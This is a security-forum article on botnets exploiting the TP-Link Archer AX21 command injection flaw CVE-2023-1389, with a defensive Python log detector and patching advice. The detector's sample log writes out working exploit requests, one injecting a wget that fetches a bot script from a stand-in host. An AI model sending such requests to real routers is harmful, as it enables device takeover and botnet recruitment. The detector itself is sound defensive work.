
Irish Information Security Forum

Botnets Continue to Exploit Unpatched TP-Link Routers


Multiple botnets are continuing to exploit a year-old flaw in unpatched TP-Link routers.


The flaw, identified as CVE-2023-1389, is a high-severity unauthenticated command injection vulnerability in the locale API of the TP-Link Archer AX21 web management interface. The value of the country parameter in a locale-settings request is passed to a shell without sanitisation, so anyone who can reach the management interface can execute arbitrary commands on the router without logging in.
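The following is an added example, not code from the IISF page, from Fortinet or from TP-Link. It shows what a practitioner would want alongside the description above: a small detector that reads web-server style access logs and flags requests to the locale form whose country value is not a plain country code, together with the allow-list check the firmware should have applied before handing the value to a shell. The request shape (an unauthenticated request to the locale form with form=country, operation=write and an attacker-controlled country parameter) is the publicly documented one and is not described on this page; the log lines, IP addresses and the ISO 3166 two-letter allow-list are assumptions constructed for the example.

```python
"""Spot CVE-2023-1389 exploitation attempts in access logs.

Added example; not code from the IISF page, Fortinet or TP-Link. It assumes
the publicly documented request shape for the flaw. The log lines below are
constructed for the example and are not real telemetry.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx combined log format (not real data).
# Line 1 and line 4 carry shell syntax in the country value; line 2 is a benign
# locale write; line 3 is an unrelated request to the same CGI handler.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2024:10:01:33 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28wget+http%3A%2F%2F198.51.100.9%2Fbot.sh+-O+%2Ftmp%2Fb%29 HTTP/1.1" 200 37 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Apr/2024:10:02:10 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=IE HTTP/1.1" 200 37 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Apr/2024:10:03:05 +0000] "GET /cgi-bin/luci/;stok=abc123/admin/status HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2024:10:04:51 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=IE%3B%60id%60 HTTP/1.1" 200 37 "-" "curl/7.88"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that turn a "country code" into a shell command.
SHELL_META_RE = re.compile(r'[$`;|&<>(){}\n]')

# Allow-list of what the form should ever receive (assumption: ISO 3166 alpha-2).
COUNTRY_RE = re.compile(r'^[A-Z]{2}$')


def validate_country(value: str) -> bool:
    """The allow-list check the firmware should apply before touching a shell.

    Rejecting everything outside the allow-list is safer than trying to strip
    metacharacters, because there is no second way to spell a valid code.
    """
    return COUNTRY_RE.fullmatch(value) is not None


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])          # urlsplit keeps ';stok=' inside the path
    rec["path"] = parts.path
    # parse_qs percent-decodes and turns '+' into a space, which is what the
    # router's CGI sees; keep the last value when a key is repeated.
    rec["query"] = {k: v[-1] for k, v in
                    parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def is_locale_write(rec: dict) -> bool:
    """True for requests aimed at the vulnerable locale/country form."""
    return (rec["path"].endswith("/locale")
            and rec["query"].get("form") == "country"
            and rec["query"].get("operation") == "write")


def scan_log(text: str) -> list:
    """Return one finding per locale write whose country value fails the allow-list."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_locale_write(rec):
            continue
        country = rec["query"].get("country", "")
        if validate_country(country):
            continue
        reason = ("shell metacharacters" if SHELL_META_RE.search(country)
                  else "malformed country code")
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                         "country": country, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} country={f['country']!r} ({f['reason']})")
```

Run against SAMPLE_LOG the script reports the two requests from 203.0.113.7 and ignores the benign write and the unrelated request. The same scan_log function can be pointed at a reverse-proxy or IDS log in front of a management interface; the point it makes is that a strict allow-list on the country value (validate_country) would have closed the injection regardless of which shell syntax a given botnet uses.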


The flaw was discovered by several researchers in January 2023 and reported to the vendor through the Zero-Day Initiative (ZDI)¹. TP-Link addressed the problem with the release of firmware security updates in March 2023¹. However, despite the vendor's release of a security update last year, a significant number of users continue to use outdated firmware¹.


At least six distinct botnet malware operations are hunting for TP-Link Archer AX21 (AX1800) routers vulnerable to this security issue¹. These botnets include Moobot, Miori, AGoent, a Gafgyt variant, and variants of the infamous Mirai botnet⁴. Each of these botnets utilizes different methods and scripts to exploit the vulnerability, establish control over the compromised devices, and command them to take part in malicious activities such as distributed denial of service (DDoS) attacks¹.


Fortinet recently warned that it had observed a surge in malicious activity exploiting the vulnerability, which it attributed to six botnet operations¹. Fortinet's telemetry shows that from March 2024 onward, daily infection attempts leveraging CVE-2023-1389 frequently exceeded 40,000 and reached as many as 50,000¹.

[Image: TP-Link Archer AX21 web management interface]


The continued exploitation of this year-old vulnerability highlights the importance of applying firmware updates promptly. Owners of Archer AX21 routers should install the firmware TP-Link released in March 2023, or any later version, and restart the device afterwards. Because the flaw is reached through the web management interface, they should also make sure remote management from the WAN side is disabled so that the interface is not exposed to the internet; that reduces exposure but is not a substitute for the update, since the interface remains reachable from the local network.



References
(1) Multiple botnets exploiting one-year-old TP-Link flaw to hack routers. https://www.bleepingcomputer.com/news/security/multiple-botnets-exploiting-one-year-old-tp-link-flaw-to-hack-routers/.
(2) Surge in Botnets Exploiting CVE-2023-1389 to Infect TP-Link Archer Routers. https://heimdalsecurity.com/blog/tp-link-archer-command-injection-vulnerability/.
(3) TP-Link routers are still being bombarded with botnet and malware threats. https://www.msn.com/en-ae/news/other/tp-link-routers-are-still-being-bombarded-with-botnet-and-malware-threats/ar-AA1ngnaf.
(4) Various Botnets Pummel Year-Old TP-Link Flaw in IoT Attacks. https://www.darkreading.com/ics-ot-security/various-botnets-pummel-tp-link-flaw-iot-attacks.
